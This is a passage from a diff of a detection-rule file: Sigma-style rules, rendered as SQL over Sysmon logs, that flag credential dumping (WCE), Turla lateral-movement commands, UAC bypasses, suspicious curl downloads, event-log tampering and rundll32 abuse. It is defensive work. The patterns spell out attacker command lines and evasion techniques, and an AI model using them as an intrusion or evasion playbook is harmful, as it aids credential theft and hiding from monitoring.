'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", - "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "test", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1053.005" + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "status": "experimental", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", + "status": "test", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_mshta_susp_execution.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", + "car.2013-10-002", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", - "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "status": "experimental", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", + "status": "experimental", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ - 